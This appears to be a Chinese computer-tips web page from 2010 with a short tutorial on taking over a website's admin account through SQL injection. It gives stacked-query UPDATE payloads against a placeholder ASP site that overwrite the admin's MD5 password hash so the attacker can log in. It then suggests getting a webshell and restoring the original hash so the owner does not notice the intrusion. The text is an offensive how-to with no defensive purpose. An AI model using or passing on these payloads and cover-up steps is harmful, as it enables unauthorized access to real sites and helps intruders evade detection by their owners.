设为首页 加入收藏高级搜索·你问我答 知识就像内裤,看不见但很重要!~
入门新手学电脑认识硬件术语
教程视频教程笔记本教程图像
系统BIOS设置安装优化配置
故障不开机死机蓝屏变慢断网
安全查木马防火墙局域网防护
XPWin7Win8Vista2003linux
选购组装DIY笔记本台式机健康
网络组网无线英特网网络维护
软件QQ聊天WordExcel其他软件
资讯热门美女游戏电影
问答硬件软件网络数码
下载必备办公桌面主题
当前位置:学电脑网 -> 操作系统 -> winxp系统 > 正文

注入修改系统管理员密码实用技巧

2010-01-05 12:49:50作者: 浏览:2301我要评论(0)
字号:T|T

  注入点已经找到:xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。

  可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 我们来尝试欺骗。可以看出,欺骗是没戏滴。 那咋办?难道要跑密码?那得浪费多少时间和内存啊?

  下面我来介绍一种新方法:注射。注射的语句如下: ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码 这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我们来测试。看见了,页面没有返回错误,表示成功了。

  现在我们对shop_admin表段下的密码做重新解猜。 [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家对比一下,已经改变了。现在我们可以登陆了。 进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。

  接着,别忘了把管理员密码还原。不然他会发现滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--

热点图文

      表  情:
      验 证 码:
      请文明发言,署名或者登录评论!(署名需要验证码)
      上海|鞍山|吉林|长沙|新疆乌鲁木齐|张家口|合肥|枣庄|开封|黄石|深圳|镇江|绍兴|济宁|内蒙通辽|巢湖|鹿泉|深州|内蒙牙克石|内蒙丰镇|瓦房店|庄河|北宁|舒兰|临江|宁安|宜兴|武进|常熟|通州|龙泉|石狮|邵武|乐平|荣成|乳山|登封|枝江|沅江|高要|东方|华蓥|雅安|巴中|